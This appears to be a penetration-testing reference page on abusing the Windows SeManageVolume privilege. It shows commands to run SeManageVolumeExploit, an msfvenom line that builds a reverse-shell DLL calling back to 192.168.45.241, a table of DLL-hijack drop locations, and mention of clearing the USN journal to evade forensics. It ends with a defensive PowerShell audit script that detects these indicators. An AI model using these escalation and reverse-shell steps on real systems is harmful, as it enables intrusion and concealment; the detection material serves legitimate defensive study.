SeManageVolume

The SeManageVolume privilege (aka Manage Volume) allows direct control over NTFS volumes, including the ability to clear the Update Sequence Number (USN) change journal, which logs every file and directory modification on a volume for forensic and backup purposes. Clearing the journal erases this history, making post-exploitation activity harder to detect.

Beyond this, the privilege can be actively exploited to gain write access to the entire volume. Tools such as SeManageVolumeExploit can leverage the privilege to modify permissions across C:\, effectively granting full control over all files and directories.

# Check permissions
> whoami /priv

Privilege Name                Description                      State
============================= ================================ ========
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled

# Run the exploit
> .\SeManageVolumeExploit.exe

# Check volume permissions
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(F) # Full Access

A SYSTEM-level shell can be gained via DLL hijacking. For example, tzres.dll can be used to perform a DLL hijack on systeminfo.

# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dll

Dropping the malicious DLL to C:\Windows\system32\wbem\tzres.dll and running systeminfo will load the DLL, executing code as NT AUTHORITY\NETWORK SERVICE.

phoneinfo.dll can also be leveraged in the same way.

Other high-value DLL hijack targets for common Windows binaries:

| Binary | DLL(s) to Hijack | Drop Location |
|---|---|---|
| systeminfo.exe | tzres.dll, wbemcomn.dll | C:\Windows\System32\wbem\ |
| taskmgr.exe | UIAutomationCore.dll | C:\Windows\System32\ |
| eventvwr.exe | mmc.dll, wevtapi.dll | C:\Windows\System32\ |
| notepad.exe | dbghelp.dll, msvcrt.dll | C:\Windows\System32\ |
| perfmon.exe | perfts.dll, perfc009.dll | C:\Windows\System32\ |
| wmic.exe | fastprox.dll, wbemcomn.dll, wmiprvsd.dll | C:\Windows\System32\wbem\ |
| winmgmt.exe | fastprox.dll, wbemcomn.dll | C:\Windows\System32\wbem\ |
| mstsc.exe | rdpencom.dll, tsres.dll | C:\Windows\System32\ |
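As an added defensive check (not code from the original page or from the SeManageVolumeExploit project), the PowerShell audit below ties the indicators on this page together: whether the current token carries SeManageVolumePrivilege, whether the USN change journal on the volume can still be queried, whether BUILTIN\Users has been granted Full Control on the root of the system drive as in the icacls output above, and whether any DLL named in the table exists in its drop location without a valid Authenticode signature. The function name Invoke-SeManageVolumeAudit and the shape of the objects it returns are assumptions of this example; the binaries, DLL names and directories are taken from the table.

```powershell
# Added defensive audit script; not code from the original page or from SeManageVolumeExploit.
# Assumptions: runs on the host being checked, in the security context whose token should be
# inspected. The DLL names and drop directories are the rows of the table above.

function Invoke-SeManageVolumeAudit {
    [CmdletBinding()]
    param(
        # Volume to inspect; defaults to the system drive (e.g. "C:").
        [string]$Drive = $env:SystemDrive
    )

    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Is SeManageVolumePrivilege present on the current token (enabled or disabled)?
    $privLine = (whoami /priv) | Select-String -SimpleMatch 'SeManageVolumePrivilege'
    if ($privLine) {
        $findings.Add([pscustomobject]@{
            Check  = 'TokenPrivilege'
            Detail = $privLine.Line.Trim()
        })
    }

    # 2. Can the USN change journal still be queried? fsutil needs elevation; a volume that
    #    normally has a journal but reports none is worth explaining.
    $journal = & fsutil usn queryjournal $Drive 2>&1
    if ($LASTEXITCODE -ne 0) {
        $findings.Add([pscustomobject]@{
            Check  = 'UsnJournal'
            Detail = "fsutil could not query the journal on $Drive : $($journal | Select-Object -First 1)"
        })
    }

    # 3. Has BUILTIN\Users been granted Full Control on the volume root (the post-exploit
    #    state shown in the icacls output above)?
    $root = "$Drive\"
    $acl  = Get-Acl -Path $root
    foreach ($ace in $acl.Access) {
        if ($ace.IdentityReference.Value -eq 'BUILTIN\Users' -and
            $ace.AccessControlType -eq 'Allow' -and
            $ace.FileSystemRights.ToString() -match 'FullControl') {
            $findings.Add([pscustomobject]@{
                Check  = 'RootAcl'
                Detail = "$root grants $($ace.FileSystemRights) to BUILTIN\Users"
            })
        }
    }

    # 4. DLL hijack candidates from the table: a file present in the drop directory without a
    #    valid signature is a planted-DLL indicator.
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $wbem  = Join-Path $sys32 'wbem'
    $hijackTable = @(
        @{ Binary = 'systeminfo.exe'; Dlls = @('tzres.dll', 'wbemcomn.dll');                    Dir = $wbem  }
        @{ Binary = 'taskmgr.exe';    Dlls = @('UIAutomationCore.dll');                         Dir = $sys32 }
        @{ Binary = 'eventvwr.exe';   Dlls = @('mmc.dll', 'wevtapi.dll');                       Dir = $sys32 }
        @{ Binary = 'notepad.exe';    Dlls = @('dbghelp.dll', 'msvcrt.dll');                    Dir = $sys32 }
        @{ Binary = 'perfmon.exe';    Dlls = @('perfts.dll', 'perfc009.dll');                   Dir = $sys32 }
        @{ Binary = 'wmic.exe';       Dlls = @('fastprox.dll', 'wbemcomn.dll', 'wmiprvsd.dll'); Dir = $wbem  }
        @{ Binary = 'winmgmt.exe';    Dlls = @('fastprox.dll', 'wbemcomn.dll');                 Dir = $wbem  }
        @{ Binary = 'mstsc.exe';      Dlls = @('rdpencom.dll', 'tsres.dll');                    Dir = $sys32 }
    )
    foreach ($row in $hijackTable) {
        foreach ($dll in $row.Dlls) {
            $path = Join-Path $row.Dir $dll
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $sig = Get-AuthenticodeSignature -FilePath $path
            if ($sig.Status -ne 'Valid') {
                $findings.Add([pscustomobject]@{
                    Check  = 'DllHijackCandidate'
                    Detail = "$path ($($row.Binary)) signature status: $($sig.Status)"
                })
            }
        }
    }

    return $findings
}

# Usage: list findings, or report a clean result.
$result = @(Invoke-SeManageVolumeAudit)
if ($result.Count -eq 0) { Write-Host "No SeManageVolume-related indicators found." }
else { $result | Format-Table -AutoSize }
```

Run it from the account whose token is in question for step 1, and elevated for step 2. The BUILTIN\Users name is localized on non-English installs, so compare against the well-known SID S-1-5-32-545 there instead. Get-AuthenticodeSignature consults the system catalogs on supported Windows versions, so the many System32 DLLs that carry no embedded signature still report Valid; NotSigned or HashMismatch on one of the listed paths is the signal worth chasing, together with the file's creation time and the owner recorded in its ACL.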
